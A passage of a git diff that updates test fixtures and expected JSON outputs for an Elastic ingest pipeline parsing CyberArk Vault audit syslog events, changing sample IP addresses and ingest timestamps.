\u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e125\u003c/MessageID\u003e\n \u003cDesc\u003eRename File (Cont.)\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eRename File (Cont.)\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eOperating System-UnixSSH-67.43.156.15-PSMConnect\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eRename File (Cont.)\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Rename File (Cont.)", "issuer": "Administrator", "rfc5424": true, - "file": "Operating System-UnixSSH-34.71.250.247-PSMConnect", + "file": "Operating System-UnixSSH-67.43.156.15-PSMConnect", "safe": "PSM", "station": "127.0.0.1", "action": "Rename File (Cont.)", @@ -62,8 +62,8 @@ "event": { "severity": 2, "action": "rename file (cont.)", - "ingested": "2021-06-09T10:24:28.428911400Z", - "original": "\u003c5\u003e1 2021-03-14T13:42:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:42:20\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:42:20Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e125\u003c/MessageID\u003e\\n \u003cDesc\u003eRename File (Cont.)\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRename File (Cont.)\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eOperating System-UnixSSH-34.71.250.247-PSMConnect\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRename File (Cont.)\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:42:20\",\"IsoTimestamp\":\"2021-03-14T13:42:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"125\",\"Desc\":\"Rename File (Cont.)\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Rename File (Cont.)\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Operating System-UnixSSH-34.71.250.247-PSMConnect\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Rename File (Cont.)\",\"GatewayStation\":\"10.0.1.20\"}}}", + "ingested": "2021-12-09T13:36:37.330972Z", + "original": "\u003c5\u003e1 2021-03-14T13:42:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:42:20\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:42:20Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e125\u003c/MessageID\u003e\\n \u003cDesc\u003eRename File (Cont.)\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRename File (Cont.)\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eOperating System-UnixSSH-67.43.156.15-PSMConnect\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRename File (Cont.)\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:42:20\",\"IsoTimestamp\":\"2021-03-14T13:42:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"125\",\"Desc\":\"Rename File (Cont.)\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Rename File (Cont.)\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Operating System-UnixSSH-67.43.156.15-PSMConnect\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Rename File (Cont.)\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "125", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-126-unlock-file.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-126-unlock-file.log-expected.json index cba3444deca..44483af4a8c 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-126-unlock-file.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-126-unlock-file.log-expected.json @@ -52,7 +52,7 @@ "event": { "severity": 2, "action": "unlock file", - "ingested": "2021-06-09T10:24:28.461269100Z", + "ingested": "2021-12-09T13:36:37.448414500Z", "original": "\u003c5\u003e1 2021-03-10T18:33:34Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:33:34\",\"IsoTimestamp\":\"2021-03-10T18:33:34Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"126\",\"Desc\":\"Unlock File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Unlock File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"Root\\\\PVConfiguration.xml\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Unlock File\",\"GatewayStation\":\"\"}}}", "code": "126", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-130-cpm-disable-password.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-130-cpm-disable-password.log index 3f6ae5f7871..e07bae4df57 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-130-cpm-disable-password.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-130-cpm-disable-password.log @@ -1 +1 @@ -<7>1 2021-03-15T12:57:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 05:57:13\n 2021-03-15T12:57:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 130\n CPM Disable Password\n Error\n PasswordManager\n CPM Disable Password\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;retriescount=5;username=ELASTIC\\bart;\n CPM Disable Password\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 05:57:13","IsoTimestamp":"2021-03-15T12:57:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"130","Desc":"CPM Disable Password","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Disable Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;retriescount=5;username=ELASTIC\\bart;","Message":"CPM Disable Password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"CPMDisabled","Value":"(CPM)MaxRetries"},{"Name":"RetriesCount","Value":"5"},{"Name":"LastFailDate","Value":"1615813031"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T12:57:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 05:57:13\n 2021-03-15T12:57:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 130\n CPM Disable Password\n Error\n PasswordManager\n CPM Disable Password\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=67.43.156.15;retriescount=5;username=ELASTIC\\bart;\n CPM Disable Password\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 05:57:13","IsoTimestamp":"2021-03-15T12:57:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"130","Desc":"CPM Disable Password","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Disable Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=67.43.156.15;retriescount=5;username=ELASTIC\\bart;","Message":"CPM Disable Password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"CPMDisabled","Value":"(CPM)MaxRetries"},{"Name":"RetriesCount","Value":"5"},{"Name":"LastFailDate","Value":"1615813031"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-130-cpm-disable-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-130-cpm-disable-password.log-expected.json index f7421893ce7..065f1158bff 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-130-cpm-disable-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-130-cpm-disable-password.log-expected.json @@ -21,7 +21,7 @@ }, "@timestamp": "2021-03-15T12:57:13.000Z", "file": { - "path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart" + "path": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart" }, "ecs": { "version": "1.12.0" @@ -38,22 +38,22 @@ "cyberarkpas": { "audit": { "severity": "Error", - "reason": "MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", + "reason": "MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", "iso_timestamp": "2021-03-15T12:57:13Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 05:57:13\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T12:57:13Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e130\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Disable Password\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Disable Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eMaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=5;username=ELASTIC\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Disable Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMDisabled\" Value=\"(CPM)MaxRetries\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"5\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615813031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 05:57:13\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T12:57:13Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e130\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Disable Password\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Disable Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eMaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=5;username=ELASTIC\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Disable Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMDisabled\" Value=\"(CPM)MaxRetries\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"5\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615813031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Disable Password", "issuer": "PasswordManager", "extra_details": { "other": { "retriescount": "5", - "address": "34.66.114.180" + "address": "67.43.156.15" }, "username": "ELASTIC\\bart" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.66.114.180", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "WinDomain", @@ -65,9 +65,9 @@ "last_task": "ReconcileTask", "cpm_error_details": "Parameter Reconcile account is mandatory but has an empty value or is not defined", "last_fail_date": "1615813031", - "logon_domain": "34.66.114.180" + "logon_domain": "67.43.156.15" }, - "file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart", + "file": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart", "safe": "partner", "station": "10.0.1.20", "action": "CPM Disable Password", @@ -81,8 +81,8 @@ "event": { "severity": 7, "reason": "Parameter Reconcile account is mandatory but has an empty value or is not defined", - "ingested": "2021-06-09T10:24:28.504981Z", - "original": "\u003c7\u003e1 2021-03-15T12:57:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 05:57:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T12:57:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e130\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Disable Password\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Disable Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eMaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=5;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Disable Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMDisabled\\\" Value=\\\"(CPM)MaxRetries\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"5\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615813031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 05:57:13\",\"IsoTimestamp\":\"2021-03-15T12:57:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"130\",\"Desc\":\"CPM Disable Password\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Disable Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=34.66.114.180;retriescount=5;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Disable Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"34.66.114.180\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"CPMDisabled\",\"Value\":\"(CPM)MaxRetries\"},{\"Name\":\"RetriesCount\",\"Value\":\"5\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615813031\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"34.66.114.180\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:37.558992Z", + "original": "\u003c7\u003e1 2021-03-15T12:57:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 05:57:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T12:57:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e130\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Disable Password\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n 